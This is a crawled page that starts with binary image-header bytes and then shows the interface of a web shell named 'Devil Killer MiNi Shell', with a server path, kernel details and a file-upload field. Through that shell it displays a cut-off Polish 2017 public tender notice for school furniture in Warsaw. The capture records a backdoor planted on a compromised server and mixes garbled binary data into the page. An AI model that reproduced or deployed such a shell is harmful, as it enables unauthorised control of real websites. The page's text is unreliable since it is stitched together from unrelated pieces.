JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20170629/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20170629/540295-N-2017.html

 <script type="text/javascript">//<![CDATA[//]]></script> <div> <style type="text/css"> .divRow_xforms { float: left; width: 100%; font-weight: normal; line-height: 30px; } .headerLarge_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: larger} .headerMedium_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: medium} .headerSmall_xforms { font-weight: bold; font-size: x-small;} .table_xforms { border-collapse: collapse; width: 900px; font-weight: normal} .table_xforms td { border: 2px solid black; border-collapse: collapse; padding: 5px;} .table_xforms th { border: 2px solid black; border-collapse: collapse; padding: 5px; font-weight: bold} @media print { .no-print, .no-print * { display: none !important; } } </style> <br /> <br /> <span id="ctl00_ContentPlaceHolder1_lblNumerOgloszenia">Ogłoszenie nr 540295-N-2017 z dnia 2017-06-29 r. </span> <br /> <br /> <div class="divRow_xforms"> <div class="headerMedium_xforms" style="text-align: center"> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc_h">Zespół Szkół Sportowych Nr 50 im. Janusza Kusocińskiego</span>: <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu_h">Dostawa, wniesienie i montaż mebli na potrzeby budynku "A" Zespołu Szkół Sportowych nr 50 im.Janusza Kusocińskiego w Warszawie</span><br/> OGŁOSZENIE O ZAMÓWIENIU - <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia_h">Dostawy</span> </div> <div> <b>Zamieszczanie ogłoszenia:</b> <span id="ctl00_ContentPlaceHolder1_zamieszczanie_obowiazkowe">Zamieszczanie obowiązkowe</span> </div> <div> <b>Ogłoszenie dotyczy:</b> <span id="ctl00_ContentPlaceHolder1_ogloszenie_dotyczy">Zamówienia publicznego</span> </div> <div> <b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_finansowane_z_unii">Nie</span> </div> <br/> <b>Nazwa projektu lub programu</b> <br/> <span id="ctl00_ContentPlaceHolder1_nazwa_projektu_programu"></span> </div> <div> <b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_ubiegac_zaklady_pracy">Nie</span> </div> <br/> Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %) <br/> <span id="ctl00_ContentPlaceHolder1_minimalny_procent_zatrudnienia"></span> </div> <div class="headerLarge_xforms" style="text-align: left"> <u>SEKCJA I: ZAMAWIAJĄCY</u> </div> <div style="padding-left: 20px"> <b>Postępowanie przeprowadza centralny zamawiający </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_centralny_zamawiajacy">Nie</span> </div> <b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_podmiot_zamawiajacy_powierzyl">Nie</span> </div> <b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_powierzyl"></span> <br/> <b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_wspolnie">Nie</span> </div> <br/> Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów: <br/> <br/> <b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_zamawiajacy_z_eu">Nie</span> </div> <b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej - mające zastosowanie krajowe prawo zamówień publicznych:</b> <span id="ctl00_ContentPlaceHolder1_postepowanie_wspolne_tresc"></span> <br/> <b>Informacje dodatkowe:</b> <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_zamawiajacy"></span> <br/> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>I. 1) NAZWA I ADRES: </b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_nazwa">Zespół Szkół Sportowych Nr 50 im. Janusza Kusocińskiego</span>, krajowy numer identyfikacyjny <span id="ctl00_ContentPlaceHolder1_regon">79331900000</span>, ul. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_ulica">ul. Samuela Bogumiła Lindego</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_domu">20</span> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_mieszkania"></span> , <span id="ctl00_ContentPlaceHolder1_zamawiajacy_kod_pocztowy">01952 </span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc">Warszawa</span>, woj. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_wojewodztwo">mazowieckie</span>, państwo <span id="ctl00_ContentPlaceHolder1_zamawiajacy_panstwo">Polska</span>, tel. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_telefon">22 834 86 58, </span>, e-mail <span id="ctl00_ContentPlaceHolder1_zamawiajacy_email">zs50@edu.um.warszawa.pl, </span>, faks <span id="ctl00_ContentPlaceHolder1_zamawiajacy_fax">22 834 86 58</span>. <br/> Adres strony internetowej (URL): <span id="ctl00_ContentPlaceHolder1_adres_strony_url">http://www.kusy.edu.pl</span> <br/> Adres profilu nabywcy: <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej"></span> <br/> Adres strony internetowej pod którym można uzyskać dostęp do narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej_narzedzia"></span> </div> <div style="text-align: left"> <b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego">Inny (proszę określić):</span> <br /> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego_inny">Jednostka organizacyjna nie posiadająca osobowości prawnej</span> </div> <div style="text-align: left"> <b> I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>: </b> <div style="padding-left: 20px"> Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających): <br/> <span id="ctl00_ContentPlaceHolder1_wspolne_udzielanie_zamowienia"></span> </div> </div> <div style="text-align: left"> <b> I.4) KOMUNIKACJA: </b> <br/> <b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_dokumentow_zamowienia">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_dokumentow_zamowienia">http://www.kusy.pl</span> </div> <br/> <b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_zamieszczona_bedzie_specyfikacja">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_zamieszczona_bedzie_specyfikacja"></span> </div> <br/> <b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_do_dokumentow_ograniczony">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_do_dokumentow_ograniczony"></span> </div> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b> <br/> <b>Elektronicznie</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_oferty_wnioski_dostepne">Nie</span> <br/> adres <br/> <span id="ctl00_ContentPlaceHolder1_oferty_wnioski_dostepne"></span> </div> <br/> <div style="padding-left: 20px"> <b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszczone_wymagane_przeslanie_ofert">Nie</span> <br/> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_inny"></span> <br/> <b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_wymagane_przeslanie_ofert">Tak</span> <br /> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_wymagane_przeslanie_ofert_inny">Składanie wniosków o dopuszczenie do udziału w licytacji elektronicznej odbywa się za pośrednictwem operatora pocztowego w rozumieniu ustawy z 23 listopada 2012 r. - Prawo pocztowe (Dz.U. z 2012 r. poz. 1529 oraz z 2015 r. poz.1830) posłańca lub osobiście (wniosek musi być złożony w formie pisemnej)</span> <br/> Adres: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_adres">Zespół Szkół Sportowych nr 50 im.Janusza Kusocińskiego, ul.Lindego 20, 01-952 Warszawa, Miejsce złożenia wniosku: Główny Sekretariat Szkoły</span> </div> <br/> <b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_komunikacja_elektroniczna_wymaga">Nie</span> <br/> Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL) <br/> <span id="ctl00_ContentPlaceHolder1_komunikacja_elektroniczna_wymaga"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA II: PRZEDMIOT ZAMÓWIENIA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b> <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu">Dostawa, wniesienie i montaż mebli na potrzeby budynku "A" Zespołu Szkół Sportowych nr 50 im.Janusza Kusocińskiego w Warszawie</span> <br/> <b>Numer referencyjny: </b> <span id="ctl00_ContentPlaceHolder1_numer_referencyjny">ZSS50.ZP.26.4.2017</span> <br/> <b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b> <br/> <div style="padding-left: 20px; text-align: justify"> <span id="ctl00_ContentPlaceHolder1_czy_dialog_techniczny">Nie</span> </div> <br/> <b>II.2) Rodzaj zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia">Dostawy</span> <br/> <b>II.3) Informacja o możliwości składania ofert częściowych</b> <br/> Zamówienie podzielone jest na części: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_podzielone_na_czesci">Nie</span> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b> <br/> <span id="ctl00_ContentPlaceHolder1_oferty_lub_wnioski"></span> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci"></span> <br/> </div> <b>Zamawiający zastrzega sobie prawo do udzielenia łącznie następujących części lub grup części:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zastrzega_prawo_grup_czesci"></span> <br/> <b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b> <br/> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci_jednemu_wykonawcy"></span> <br/> <br/> <br/> <b> II.4) Krótki opis przedmiotu zamówienia </b> <i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane: </b> <span id="ctl00_ContentPlaceHolder1_okreslenie_przedmiotu">1. Przedmiotem zamówienia jest dostawa, wniesienie i montaż nowych,nieużywanych, kompletnych i sprawnych technicznie mebli na potrzeby budynku "A" ZespołuSzkół Sportowych nr 50 im. Janusza Kusocińskiego w Warszawie. Szczegółowy opis orazilość asortymentu określa Opis przedmiotu zamówienia stanowiący załącznik nr 1 doOgłoszenia. Szczegółowe warunki realizacji zamówienia zawiera wzór umowy zawarty wsekcji IV- pkt 4) Ogłoszenia oraz stanowiący równocześnie załącznik nr 2 do Ogłoszenia. 1) Wramach dostawy Wykonawca zobowiązuje się do transportu mebli do siedziby Zamawiającegoprzy ul. Lindego 20, budynek "A", 01-952 Warszawa, a następnie do wniesieniamebli na terenie budynku "A" Zespołu Szkół Sportowych nr 50 im. Janusza Kusocińskiegooraz ich ustawienia i montażu w pomieszczeniach wskazanych przez Zamawiającego (budynek bezwindy); 2) Wszystkie oferowane meble muszą spełniać wszystkie wymogitechnicznojakościowe określone w przepisach prawa, w tym normy bezpieczeństwa; 3) Nawszystkie zaoferowane meble Wykonawca udzieli 2 letniej gwarancji liczonej od dniapodpisania protokołu odbioru mebli bez uwag. Dodatkowo gwarancja ma obejmować wszelkieuszkodzenia okuć meblowych (zwłaszcza mechaniczne) powstałe przy eksploatacji meblaprzez cały okres obowiązywania gwarancji. 2. Okres w którym realizowane będziezamówienie: do dnia 16 sierpnia 2017 r., przy czym terminy planowanej dostawy mebliWykonawca jest zobowiązany uzgodnić z Zamawiającym.</span> <br/> <br/> <b>II.5) Główny kod CPV: </b> <span id="ctl00_ContentPlaceHolder1_cpv_glowny_przedmiot">39100000-3</span> <br/> <b> Dodatkowe kody CPV:</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kod CPV</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>39160000-1</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>39140000-5</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>39130000-2</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>39120000-9</TD></TR></TABLE> <br /> <br /> <b> II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>: <br/> Wartość bez VAT: <span id="ctl00_ContentPlaceHolder1_szacunkowa_wartosc_zamowienia_calosc"></span> <br/> Waluta: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_waluta_calosc"></span> <br/> <i>(w przypadku umów ramowych lub dynamicznego systemu zakupów - szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i> </div> <br/> <b> II.7) Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: </b> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67">Nie</span> <br/> Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67_tekst"></span> <br/> <b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b> <br /> miesiącach:&#160; <span id="ctl00_ContentPlaceHolder1_okres_w_miesiacach"></span> &#160;<i> lub </i> <b> dniach:</b> <span id="ctl00_ContentPlaceHolder1_okres_w_dniach"></span> <br /> <i>lub</i> <br /> <b> data rozpoczęcia: </b> <span id="ctl00_ContentPlaceHolder1_data_rozpoczecia"></span> &#160;<i> lub </i><b> zakończenia: </b> <span id="ctl00_ContentPlaceHolder1_data_zakonczenia">2017-08-16</span> <br /> <br/> <b>II.9) Informacje dodatkowe: </b> <span id="ctl00_ContentPlaceHolder1_informacje_na_temat_katalogow">Zasady przygotowania wniosku o dopuszczenie do udziału wlicytacji elektronicznej: 1) Treść wniosku o dopuszczenie do udziału w licytacji elektronicznejwraz z pozostałymi załącznikami, można pobrać ze strony internetowej Zamawiającego:http://www.kusy.edu.pl - odpowiednio w formacie pdf/word. 2) Wykonawca może złożyćtylko jeden wniosek. Złożenie większej liczby wniosków spowoduje odrzucenie wszystkichzłożonych wniosków złożonych przez danego Wykonawcę. 3) Wniosek oraz wszelkiewymagane dokumenty muszą spełniać następujące wymogi: a) musi zostać sporządzony w języku polskim, z zachowaniem formy pisemnej na maszynie do pisania, komputerze, ręczniedługopisem czytelnym pismem, b) wniosek i wszystkie załączone dokumenty sporządzoneprzez Wykonawcę muszą być podpisane; za podpisanie uznaje się własnoręczny podpis zpieczątką imienną lub czytelnie imię i nazwisko osoby/ób upoważnionej/ych doreprezentowania, zgodnie z formą reprezentacji Wykonawcy, określoną w dokumencierejestrowym lub innym dokumencie, właściwym dla formy organizacyjnej. W przypadku, gdyWykonawcę reprezentuje pełnomocnik, do wniosku musi być dołączone pełnomocnictwo(oryginał lub poświadczona notarialnie kopia) określające jego zakres i podpisane przez osobyuprawnione do reprezentacji Wykonawcy. 4) Dokumenty należy złożyć w formie oryginału lubkopii poświadczonej za zgodność z oryginałem przez Wykonawcę (osobę upoważnioną doreprezentacji Wykonawcy zgodnie z aktualnym dokumentem rejestrowym firmy lub zgodnie zpełnomocnictwem) z wyłączeniem dokumentów, których forma została odmiennie określona wogłoszeniu. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówieniaoraz w przypadku innych podmiotów, na którego zdolnościach Wykonawca polegana zasadach określonych w art.22a ust.1 ustawy, poświadczenia za zgodność z oryginałemdokonują odpowiednio Wykonawcy wspólnie ubiegający się o udzielenie zamówieniapublicznego albo podmiot, na którego zdolnościach polega Wykonawca, w zakresie dokumentów, które każdego z nich dotyczą. 5) Osobąstwierdzającą zgodność kopii dokumentu z oryginałem musi być osoba/y upoważniona/e doreprezentowania Wykonawcy zgodnie z aktualnym dokumentem rejestrowym firmy lubzgodnie z pełnomocnictwem. 6) Poprawki lub zmiany (również przy użycia korektora)powinny być parafowane przez osobę/y podpisującą/e wniosek. 7) Dokumenty sporządzone wjęzyku obcym, muszą być składane wraz z ich tłumaczeniem na język polski. 8) Wniosek wraz z załącznikami należy złożyć w zamkniętej kopercieopatrzonej co najmniej nazwą przedmiotu zamówienia. 9) Postępowanie o udzieleniezamówienia publicznego prowadzone jest w trybie licytacji elektronicznej na podstawieprzepisów ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (Dz.U. z 2015 r.,poz. 2164 ze zm.), zwanej w ogłoszeniu ustawą. 10) Nr sprawy ZSS50.ZP.26.4.2017-Wykonawcy winni we wszystkich kontaktach z Zamawiającym, powoływać się na wskazanynr sprawy. 11) Osoba do kontaktu: Maria Tabor.</span> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b> III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU </b> <br/> <div style="padding-left: 20px"> <b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_okreslenie_warunkow">Zamawiający nie określa niniejszego warunku.</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_okreslenie_warunkow"></span> <br/> <b>III.1.2) Sytuacja finansowa lub ekonomiczna </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_okreslenie_warunkow">Zamawiający nie określa niniejszego warunku.</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_informacje_dodatkowe"></span> <br/> <b>III.1.3) Zdolność techniczna lub zawodowa </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_okreslenie_warunkow">Za spełniających warunek udziału w postępowaniu Zamawiającyuzna Wykonawców, którzy wykażą, że w okresie ostatnich trzech lat przed upływemterminu składania wniosków do udziału w postępowaniu, a jeżeli okres prowadzeniadziałalności jest krótszy - w tym okresie wykonali ( zrealizowali ) co najmniej jednądostawę mebli szkolnych, akademickich, biurowych lub domowych - na kwotę brutto min.100 000 zł. Ocena spełniania warunku udziału w postępowaniu dokonana zostanie wsystemie ,,1" lub ,,0", zgodnie z formułą ,,spełnia-nie spełnia" w oparciu o informacjezawarte w oświadczeniu o spełnianiu warunków udziału w postępowaniu, o którym mowaw sekcji III - pkt 3) Ogłoszenia.</span> <br/> Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób: <span id="ctl00_ContentPlaceHolder1_czy_zdolnosc_techniczna_wymaga_wykonawcow">Nie</span> <br/> Informacje dodatkowe: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_informacje_dodatkowe"></span> </div> <b> III.2) PODSTAWY WYKLUCZENIA </b> <br/> <div style="padding-left: 20px"> <b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1 ustawy Pzp</b> <br/> <b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b> <span id="ctl00_ContentPlaceHolder1_czy_zamawiajacy_przewiduje_wykluczenie">Nie</span> Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia: <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_1"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_2"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_3"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_4"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_5"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_6"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_7"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_8"></span> <br/> </div> <b> III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI </b> <br/> <div style="padding-left: 20px"> <b> Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_niepodleganiu_wykluczenia">Tak</span> <br/> <b> Oświadczenie o spełnianiu kryteriów selekcji </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_spelnienie_kryteriow">Nie</span> </div> <b> III.4) WYKAZ 